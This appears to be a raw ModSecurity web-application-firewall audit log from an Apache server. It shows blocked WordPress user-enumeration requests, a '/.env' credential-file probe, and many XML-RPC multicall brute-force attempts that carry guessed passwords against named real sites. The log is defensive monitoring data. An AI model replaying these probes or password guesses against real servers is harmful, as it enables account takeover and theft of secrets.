Action: Intercepted (phase 2) Stopwatch: 1748436277243315 3071 (- - -) Stopwatch2: 1748436277243315 3071; combined=1369, p1=457, p2=881, p3=0, p4=0, p5=30, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5315801f-Z-- --17bd9339-A-- [28/May/2025:19:45:33 +0700] aDcFbRwBHP_x2VCWa06bRwAAANg 103.236.140.4 45606 103.236.140.4 8181 --17bd9339-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 99.56.194.42 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 99.56.194.42 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --17bd9339-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --17bd9339-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748436333452643 3157 (- - -) Stopwatch2: 1748436333452643 3157; combined=1411, p1=499, p2=881, p3=0, p4=0, p5=31, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17bd9339-Z-- --83a7965b-A-- [28/May/2025:19:51:52 +0700] aDcG6A3r-0gDryHAyD_fPQAAAEo 103.236.140.4 46192 103.236.140.4 8181 --83a7965b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 147.182.137.182 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 147.182.137.182 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --83a7965b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83a7965b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748436712258470 787 (- - -) Stopwatch2: 1748436712258470 787; combined=333, p1=294, p2=0, p3=0, p4=0, p5=38, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83a7965b-Z-- --83b8f86b-A-- [28/May/2025:19:58:12 +0700] aDcIZBwBHP_x2VCWa06blwAAAM4 103.236.140.4 46626 103.236.140.4 8181 --83b8f86b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.18.250.175 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.18.250.175 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --83b8f86b-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelPrismi123 --83b8f86b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83b8f86b-E-- --83b8f86b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.18.250.175 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748437092134281 5410 (- - -) Stopwatch2: 1748437092134281 5410; combined=4345, p1=454, p2=3595, p3=0, p4=0, p5=197, sr=83, sw=99, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83b8f86b-Z-- --a2295c0c-A-- [28/May/2025:20:05:19 +0700] aDcKDw3r-0gDryHAyD_fkQAAAFM 103.236.140.4 47186 103.236.140.4 8181 --a2295c0c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.18.250.175 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.18.250.175 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --a2295c0c-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix123@@ --a2295c0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a2295c0c-E-- --a2295c0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.18.250.175 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748437519592328 6528 (- - -) Stopwatch2: 1748437519592328 6528; combined=4474, p1=542, p2=3744, p3=0, p4=0, p5=110, sr=99, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2295c0c-Z-- --bdde2f4c-A-- [28/May/2025:20:14:48 +0700] aDcMSPnnEwDNUSjDseIvUQAAAI4 103.236.140.4 47816 103.236.140.4 8181 --bdde2f4c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 84.247.150.34 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 84.247.150.34 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --bdde2f4c-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel@000 --bdde2f4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bdde2f4c-E-- --bdde2f4c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 84.247.150.34 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748438088374144 4886 (- - -) Stopwatch2: 1748438088374144 4886; combined=3763, p1=407, p2=3186, p3=0, p4=0, p5=101, sr=78, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bdde2f4c-Z-- --5f34b82d-A-- [28/May/2025:20:18:18 +0700] aDcNGhwBHP_x2VCWa06cEwAAAMg 103.236.140.4 48090 103.236.140.4 8181 --5f34b82d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 84.247.150.34 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 84.247.150.34 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5f34b82d-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel1236 --5f34b82d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f34b82d-E-- --5f34b82d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 84.247.150.34 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748438298493524 4469 (- - -) Stopwatch2: 1748438298493524 4469; combined=3504, p1=361, p2=2977, p3=0, p4=0, p5=97, sr=77, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f34b82d-Z-- --0fb1976a-A-- [28/May/2025:20:20:50 +0700] aDcNsvnnEwDNUSjDseIvgwAAAIM 103.236.140.4 48316 103.236.140.4 8181 --0fb1976a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.223.221.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.223.221.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0fb1976a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fb1976a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748438450727912 2984 (- - -) Stopwatch2: 1748438450727912 2984; combined=1436, p1=447, p2=953, p3=0, p4=0, p5=35, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fb1976a-Z-- --786a532c-A-- [28/May/2025:20:24:24 +0700] aDcOiOszXCullgn3bbHDHwAAABA 103.236.140.4 48586 103.236.140.4 8181 --786a532c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.36.142.130 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.36.142.130 X-Forwarded-Proto: https Connection: close Content-Length: 491 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --786a532c-C-- system.multicallmethodNamewp.getUsersBlogsparamsrizalfadil987rizalfadil --786a532c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --786a532c-E-- --786a532c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.36.142.130 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748438664047496 5756 (- - -) Stopwatch2: 1748438664047496 5756; combined=4376, p1=504, p2=3707, p3=0, p4=0, p5=99, sr=85, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --786a532c-Z-- --22aff13c-A-- [28/May/2025:20:25:18 +0700] aDcOvhwBHP_x2VCWa06cTQAAAMk 103.236.140.4 48640 103.236.140.4 8181 --22aff13c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 107.180.237.122 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 107.180.237.122 X-Forwarded-Proto: https Connection: close Content-Length: 490 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --22aff13c-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelAntheadarrigo92 --22aff13c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --22aff13c-E-- --22aff13c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 107.180.237.122 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748438718382845 5245 (- - -) Stopwatch2: 1748438718382845 5245; combined=3855, p1=459, p2=3232, p3=0, p4=0, p5=97, sr=81, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22aff13c-Z-- --a1c3b258-A-- [28/May/2025:20:32:34 +0700] aDcQcg3r-0gDryHAyD_gJwAAAFE 103.236.140.4 49288 103.236.140.4 8181 --a1c3b258-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.36.142.130 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.36.142.130 X-Forwarded-Proto: https Connection: close Content-Length: 496 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --a1c3b258-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhel[login][login]faadhel --a1c3b258-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1c3b258-E-- --a1c3b258-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.36.142.130 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748439154355518 4118 (- - -) Stopwatch2: 1748439154355518 4118; combined=3171, p1=332, p2=2641, p3=0, p4=0, p5=138, sr=74, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1c3b258-Z-- --403ad347-A-- [28/May/2025:20:33:08 +0700] aDcQlA3r-0gDryHAyD_gLwAAAFY 103.236.140.4 49308 103.236.140.4 8181 --403ad347-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --403ad347-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhelns --403ad347-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --403ad347-E-- --403ad347-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748439188137225 5858 (- - -) Stopwatch2: 1748439188137225 5858; combined=4236, p1=499, p2=3572, p3=0, p4=0, p5=98, sr=99, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --403ad347-Z-- --0d929b06-A-- [28/May/2025:20:33:39 +0700] aDcQs_nnEwDNUSjDseIv8wAAAIo 103.236.140.4 49368 103.236.140.4 8181 --0d929b06-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.36.142.130 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.36.142.130 X-Forwarded-Proto: https Connection: close Content-Length: 496 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0d929b06-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel@netatwork.com --0d929b06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d929b06-E-- --0d929b06-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.36.142.130 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748439219625460 6108 (- - -) Stopwatch2: 1748439219625460 6108; combined=4458, p1=508, p2=3724, p3=0, p4=0, p5=128, sr=103, sw=98, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d929b06-Z-- --a69fa434-A-- [28/May/2025:20:36:25 +0700] aDcRWeszXCullgn3bbHDpQAAAAQ 103.236.140.4 49626 103.236.140.4 8181 --a69fa434-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.36.142.130 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.36.142.130 X-Forwarded-Proto: https Connection: close Content-Length: 488 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --a69fa434-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelcsibrafaadhel --a69fa434-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a69fa434-E-- --a69fa434-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.36.142.130 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748439385841263 6125 (- - -) Stopwatch2: 1748439385841263 6125; combined=4301, p1=519, p2=3605, p3=0, p4=0, p5=105, sr=90, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a69fa434-Z-- --b48f2d4c-A-- [28/May/2025:20:40:27 +0700] aDcSS-szXCullgn3bbHD0gAAAAc 103.236.140.4 49864 103.236.140.4 8181 --b48f2d4c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b48f2d4c-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelantix_admin@ --b48f2d4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b48f2d4c-E-- --b48f2d4c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748439627867867 5724 (- - -) Stopwatch2: 1748439627867867 5724; combined=4010, p1=489, p2=3330, p3=0, p4=0, p5=110, sr=88, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b48f2d4c-Z-- --f2a9a650-A-- [28/May/2025:20:41:28 +0700] aDcSiOszXCullgn3bbHD6wAAAAU 103.236.140.4 49954 103.236.140.4 8181 --f2a9a650-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 491 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --f2a9a650-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelantixadmin123!@# --f2a9a650-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2a9a650-E-- --f2a9a650-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748439688394219 5246 (- - -) Stopwatch2: 1748439688394219 5246; combined=4115, p1=456, p2=3489, p3=0, p4=0, p5=100, sr=84, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2a9a650-Z-- --679ca97a-A-- [28/May/2025:20:42:28 +0700] aDcSxBwBHP_x2VCWa06c0wAAANU 103.236.140.4 50072 103.236.140.4 8181 --679ca97a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.36.142.130 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.36.142.130 X-Forwarded-Proto: https Connection: close Content-Length: 490 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --679ca97a-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelantix_admin1995 --679ca97a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --679ca97a-E-- --679ca97a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.36.142.130 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748439748575096 20222 (- - -) Stopwatch2: 1748439748575096 20222; combined=34618, p1=402, p2=3136, p3=0, p4=0, p5=15553, sr=81, sw=71, l=0, gc=15456 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
